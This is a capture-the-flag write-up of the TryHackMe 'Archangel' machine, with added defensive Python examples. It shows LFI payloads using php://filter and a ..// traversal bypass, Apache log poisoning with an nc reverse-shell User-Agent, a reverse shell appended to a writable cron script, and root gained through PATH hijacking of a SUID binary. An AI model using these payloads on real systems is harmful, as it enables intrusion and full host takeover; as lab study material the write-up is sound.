disclaimer
The hosts penetrated in this article are legally authorized. The tools and methods used in this article are for learning and exchange only. Please do not use the tools or penetration ideas from this article for any illegal purpose. I will not be responsible for any consequences arising from this, nor for any misuse or damage caused.
service discovery
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nmap -sV -Pn 10.10.228.134
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDT
Nmap scan report for 10.10.228.134
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds
Port 80 penetration
Directory brute-forcing
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.228.134

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.228.134/_21-10-29_06-02-36.txt

Error Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.log

Target: http://10.10.228.134/

[06:02:37] Starting:
[06:03:59] 301 -  312B  - /flags  ->  http://10.10.228.134/flags/
[06:04:06] 301 -  313B  - /images  ->  http://10.10.228.134/images/
[06:04:06] 200 -    0B  - /images/
[06:04:08] 200 -   19KB - /index.html
[06:04:29] 301 -  312B  - /pages  ->  http://10.10.228.134/pages/
[06:04:30] 200 -    0B  - /pages/
[06:04:44] 403 -  277B  - /server-status
/flags redirects to a YouTube video and carries no other information, so it should be a rabbit hole. The other folders contain nothing of interest either.
Check the page source and find a domain name in the "Send us a mail" section. Write mafialive.thm into the hosts file:
echo "10.10.228.134 mafialive.thm" >> /etc/hosts
Open mafialive.thm and find flag1
Brute-force the directories again
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://mafialive.thm

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt

Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log

Target: http://mafialive.thm/

[06:52:01] Starting:
[06:53:22] 200 -   59B  - /index.html
[06:53:50] 200 -   34B  - /robots.txt
[06:54:02] 200 -  286B  - /test.php
Open test.php and click the button on the page. The URL then shows a file path, and changing the file name in that path lets us read the content of other files on the server, which indicates an LFI vulnerability.
We use the PHP filter pseudo-protocol to dump the source code of the entire page; the payload is as follows:
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
Decode the output to get the source code of test.php and flag2.
Review the include code
<?php
    // Returns true when $substr occurs anywhere in $str
    function containsStr($str, $substr) {
        return strpos($str, $substr) !== false;
    }
    if(isset($_GET["view"])){
        // Gate: the literal '../..' must be absent and the webroot string must be present
        if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
            include $_GET['view'];
        }else{
            echo 'Sorry, Thats not allowed';
        }
    }
?>
The include only takes effect when the string ../.. is absent and the string /var/www/html/development_testing is present.
We can write ..// instead of ../ to bypass the restriction that ../.. must not appear, and read /etc/passwd. The payload is as follows:
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd
Get the usernames after base64-decoding the output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash
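The gate in test.php and the ..// bypass, reimplemented in Python beside a hardened version of the same check. This is an added example, not the page's code: contains_str and original_check mirror the PHP shown above, hardened_check is an assumed replacement that refuses stream wrappers and normalises the path before testing the prefix, and the SAMPLES are constructed from the page's payloads.

```python
import os

WEBROOT = "/var/www/html/development_testing"


def contains_str(s: str, sub: str) -> bool:
    # Python equivalent of the page's containsStr(): strpos($str, $substr) !== false
    return sub in s


def original_check(view: str) -> bool:
    """The include gate from test.php as shown on the page: the literal '../..' must be
    absent and the webroot string must appear somewhere. True means include would run."""
    return (not contains_str(view, "../..")) and contains_str(view, WEBROOT)


def hardened_check(view: str, webroot: str = WEBROOT) -> bool:
    """Assumed defender's replacement (not the page's code). Three changes:
    1. refuse stream wrappers such as php://, so php://filter cannot dump source;
    2. refuse NUL bytes, which truncate paths in older PHP versions;
    3. normalise the path and require the *result* to stay inside webroot, so every
       spelling of traversal ('../', '..//', 'x/../../') is collapsed before the test.
    os.path.normpath is purely lexical, which keeps this deterministic; a deployment
    would additionally resolve symlinks with os.path.realpath once the file exists."""
    if "://" in view or "\x00" in view:
        return False
    if not view.startswith("/"):
        view = os.path.join(webroot, view)
    resolved = os.path.normpath(view)
    return resolved == webroot or resolved.startswith(webroot + "/")


# Constructed sample inputs: the page's two payloads, a plain traversal, and a benign request.
SAMPLES = {
    "source dump": "php://filter/convert.base64-encode/resource=" + WEBROOT + "/test.php",
    "passwd via ..//": "php://filter/convert.base64-encode/resource=" + WEBROOT + "/..//..//..//..//etc/passwd",
    "plain ../..": WEBROOT + "/../../../../etc/passwd",
    "legitimate": WEBROOT + "/test.php",
}


def compare() -> dict:
    """Run both gates over SAMPLES; returns {name: (original_allows, hardened_allows)}."""
    return {name: (original_check(v), hardened_check(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (orig, hard) in compare().items():
        print(f"{name:16} original={str(orig):5} hardened={hard}")
```

The original gate passes both php://filter payloads because it tests for one literal spelling of traversal and for the webroot string anywhere in the value; the hardened version rejects them because the wrapper is refused outright and, for plain paths, the prefix is tested only after `..` components have been collapsed.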
From the above we can see there is a user archangel. Brute-forcing this user's SSH login gives no result, so I have to think of other methods.
After some testing, I found the path of Apache's access.log:
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
analyze
Apache 2.4-2.9 has a file parsing vulnerability. Combined with the LFI, we can write the payload into the log and then include the log file through the web page, which triggers the reverse shell.
First, let's look at what a normal log record looks like:
10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
As the log above shows, Apache records the requested URL path and the User-Agent.
So we can put PHP code into the User-Agent. Taking the line above as an example, the effect we expect is this:
10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "<?php phpinfo(); ?>"
Then include this log through the browser.
If the PHP version information is displayed on the page at this point, our PHP code is being executed.
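From the defender's side, the same log that the attacker poisons is also where the attack is visible. The following added example (not from the page) parses Apache combined-format lines and flags the indicators this technique leaves behind: php:// wrappers and traversal in the request path, an include of a path under /var/log/, and a PHP open tag planted in the User-Agent or Referer. The SAMPLE_LOG lines are constructed: the first is modelled on the page's normal record, the second on the poisoned record the page describes, the third is benign traffic.

```python
import re

# Apache "combined" log format, as in the lines the page shows.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of the LFI + log poisoning chain described on the page.
INDICATORS = {
    "php_wrapper": re.compile(r"php://", re.I),        # php://filter source dumps
    "traversal":   re.compile(r"\.\./|%2e%2e", re.I),  # '../' (also matches the '..//' spelling)
    "log_include": re.compile(r"/var/log/", re.I),     # include of a log file, the trigger step
    "php_tag":     re.compile(r"<\?(php|=)", re.I),    # PHP open tag planted in a request header
}

# Constructed sample log (not captured traffic), modelled on the page's entries.
SAMPLE_LOG = (
    '10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"\n'
    '10.13.21.169 - - [02/Nov/2021:14:20:01 +0530] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 5120 "-" "<?php phpinfo(); ?>"\n'
    '10.10.1.5 - - [02/Nov/2021:14:21:10 +0530] "GET /index.html HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/78.0"\n'
)


def analyze_line(line: str):
    """Return (client_ip, request_path, set_of_indicator_names), or None when nothing matches.
    Path indicators are tested on the request path; the PHP tag is tested on User-Agent and
    Referer, which the client fully controls. A line that does not parse (for example an
    escaped quote inside the User-Agent) is scanned whole, so a malformed line cannot hide
    a payload."""
    m = LOG_RE.match(line)
    if m:
        ip, path, headers = m["ip"], m["path"], m["ua"] + " " + m["referer"]
    else:
        ip, path, headers = line.split(" ", 1)[0], line, line
    findings = {name for name in ("php_wrapper", "traversal", "log_include")
                if INDICATORS[name].search(path)}
    if INDICATORS["php_tag"].search(headers):
        findings.add("php_tag")
    return (ip, path, findings) if findings else None


def scan(log_text: str) -> list:
    """Run analyze_line over every non-empty line; returns the hits in file order."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hit = analyze_line(line)
        if hit:
            results.append(hit)
    return results


if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, sorted(findings), path[:60])
```

The second sample line is the one to alert on first: a PHP open tag in a header combined with an include of /var/log/ in the same request is the trigger step of the chain, whereas php://filter plus traversal on its own is the earlier source-dump stage.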
attack
Open Burp Suite and write the payload into the User-Agent:
GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1
Host: mafialive.thm
User-Agent: "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4444 >/tmp/f') ?>"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
start the listener
nc -lnvp 4444
trigger
http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
Reverse shell received
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 54296
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls
index.html
mrrobot.php
robots.txt
test.php
$ cd /home
$ ls
archangel
$ cd archangel
$ ls
myfiles
secret
user.txt
Get user.txt in the same folder. secret has no read permission, and there is a password file in the myfiles folder whose content is the YouTube video Don’t Give Up (AKA: Tease You).
Escalate privileges to archangel
With linpeas I found a scheduled task belonging to archangel, and the script file is writable:
www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh
cat /opt/helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt
www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh
ls -alh /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 20  2020 /opt/helloworld.sh
Write a reverse shell into the scheduled task
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" >> /opt/helloworld.sh
Reverse shell received
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 37592
/bin/sh: 0: can't access tty; job control turned off
$ whoami
archangel
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
$
Get the second user.txt in /home/archangel/secret
Escalate privileges to root
There is a backup file in the same folder with the SUID bit set. After downloading it to the attack machine and analysing it with the strings command, a shell fragment is found:
┌──(root💀kali)-[~/tryhackme/Archangel]
└─# strings backup
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles
analyze
Look at the shell line above:
cp /home/user/archangel/myfiles/* /opt/backupfiles
The command copies everything under /home/user/archangel/myfiles/ to /opt/backupfiles using cp.
A SUID file runs with the privileges of its owner, here root, even when an ordinary user executes it. Although the cp inside this binary is invoked on behalf of an ordinary user, it runs as root. So if we can hijack this command and replace its content, we can use it to escalate privileges.
On Linux, the directories searched for commands are listed in the $PATH environment variable. When we type a command in the terminal, the shell searches the directories in $PATH one by one: if a binary with that name exists there it is executed, otherwise the shell reports command not found.
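The lookup rule just described, and why a relative "cp" inside a SUID binary is dangerous, as an added example that is not part of the page. It reproduces the shell's PATH search with shutil.which over two temporary directories that stand in for /home/archangel and /bin (both assumptions; the scripts placed in them are harmless stand-ins that only echo a string), shows that prepending the writable directory shadows the system cp while an absolute path is unaffected, and includes the audit a defender would run: listing PATH directories the current user can write to, which is what linpeas flags.

```python
import os
import shutil
import tempfile


def resolve(cmd: str, path: str):
    """Mimic the shell's lookup: the first executable named cmd in the PATH directories,
    or None. A name containing '/' is treated as a direct path and not searched for."""
    return shutil.which(cmd, path=path)


def writable_path_dirs(path: str) -> list:
    """Defender's check: PATH directories the current user can write to. Any hit means a
    program run with higher privileges but a relative command name can be redirected."""
    return [d for d in path.split(os.pathsep)
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def _make_exec(directory: str, name: str, body: str) -> str:
    """Write a small executable script; used only to build the stand-in binaries."""
    p = os.path.join(directory, name)
    with open(p, "w") as f:
        f.write(body)
    os.chmod(p, 0o755)
    return p


def demo() -> dict:
    """Stand-ins: `home` plays /home/archangel (attacker-writable), `sysdir` plays /bin.
    Returns which lookup each PATH produced and whether the audit flags the home dir."""
    with tempfile.TemporaryDirectory() as home, tempfile.TemporaryDirectory() as sysdir:
        real_cp = _make_exec(sysdir, "cp", "#!/bin/sh\necho real cp\n")   # stand-in for /bin/cp
        fake_cp = _make_exec(home, "cp", "#!/bin/sh\necho shadowed cp\n")  # harmless stand-in
        clean_path = sysdir
        hijacked_path = home + os.pathsep + sysdir   # the writeup's export PATH=/home/archangel:$PATH
        return {
            "clean": resolve("cp", clean_path) == real_cp,          # normal lookup finds the real one
            "hijacked": resolve("cp", hijacked_path) == fake_cp,    # writable dir first: shadowed
            "absolute": resolve(real_cp, hijacked_path) == real_cp, # absolute path ignores PATH
            "home_is_writable": home in writable_path_dirs(hijacked_path),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:17} {value}")
```

The "absolute" entry is the fix for the backup binary: calling /bin/cp by its full path (or resetting PATH to a fixed value before system()) makes the lookup independent of whatever the invoking user put in $PATH; the writable_path_dirs audit is the check that would have flagged /home/archangel appearing in front of the system directories.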
start escalation
View the current user's $PATH environment variable:
echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Add the home directory /home/archangel to the front of $PATH:
archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
echo $PATH
/home/archangel:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Create a file named cp in the newly added $PATH directory and give it execute permission:
archangel@ubuntu:~$ touch cp
touch cp
archangel@ubuntu:~$ chmod +x cp
chmod +x cp
Add the following content to the newly created cp file:
#!/bin/bash
bash -p
View the cp file:
archangel@ubuntu:~$ cat cp
cat cp
#!/bin/bash
bash -p
Everything is ready. Execute the SUID file backup and escalate to root:
archangel@ubuntu:~/secret$ ./backup
./backup
root@ubuntu:~/secret# id
id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
whoami
root
root@ubuntu:~/secret# cat /root/root.txt
cat /root/root.txt
Summary
A great target machine; I learned a lot of new things. There are generally two ways to get a shell from LFI:
1. LFI + file upload to get a shell
2. LFI + file parsing vulnerability to get a shell
This article uses the second method. As for the first method, I have a record of it in this target machine.
For privilege escalation, the method of modifying the $PATH environment variable is used. This method has to be combined with SUID. This article hijacks the cp command, but other commands such as mv or tar can be hijacked the same way; it depends on the specific situation of the target machine.